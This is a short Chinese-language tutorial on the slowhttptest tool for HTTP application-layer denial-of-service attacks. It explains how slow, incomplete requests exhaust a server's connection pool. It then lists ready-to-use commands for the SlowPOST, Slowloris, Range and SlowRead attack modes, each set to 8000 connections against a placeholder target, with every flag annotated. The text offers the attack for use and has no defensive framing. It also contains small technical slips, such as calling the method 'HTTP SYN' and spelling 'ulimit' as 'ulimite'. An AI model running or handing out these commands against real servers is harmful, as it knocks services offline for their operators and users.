HTTP应用层拒绝服务攻击工具---Slowhttptest

1. Slowhttptest

1.1. HTTP应用层拒绝服务攻击工具
  • 利用低带宽慢速拒绝服务(HTTP SYN)
  • 针对apache,、tomcat(最新版已修复此漏洞)
  • ulimite -n 70000
  • 支持代理

2. 原理

  • 大量消耗目标并发连接池
  • 缓慢发送不完整的HTTP请求,服务器等待并保持连接

3. 方式

  • SlowPOST:content-length声明长度,但body部分缓慢发送
slowhttptest -c 8000 -B -g -o body_status -i 110 -r 200 -s 8192 -t FAKEVERB -u http://1.1.1.1 -x 10 -p 3
# -c ---------------- 连接数
# -B ---------------- slow Body 方式
# -g -o ------------- 生成结果
# -i ---------------- 发送数据的时间间隔
# -r ---------------- 每秒钟建立多少个连接
# -s ---------------- 发送多少个字节
# -t ---------------- 请求方式(可以GET,POST也可以随意伪造一个)
# -u ---------------- 目标服务器地址
# -x ---------------- 一次最大发多少个字节 
# -p ---------------- 超时
  • Slowloris:http请求头只发一个\r\n(正常是两个)
slowhttptest -c 8000 -H -g -o header_status -i 10  -r 200 -t GET -u http://1.1.1.1 -x 24 -p 3
# -H ----- Slowloris方式
  • Range:向服务器发送恶意请求范围
slowhttptest -R -u http://1.1.1.1 -t HEAD -c 8000 -a 10  -b 3000  -r 500

  • SlowRead:慢速读取接收服务器返回数据
slowhttptest -c 8000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u https://1.1.1.1/index.html -p 3

推荐阅读更多精彩内容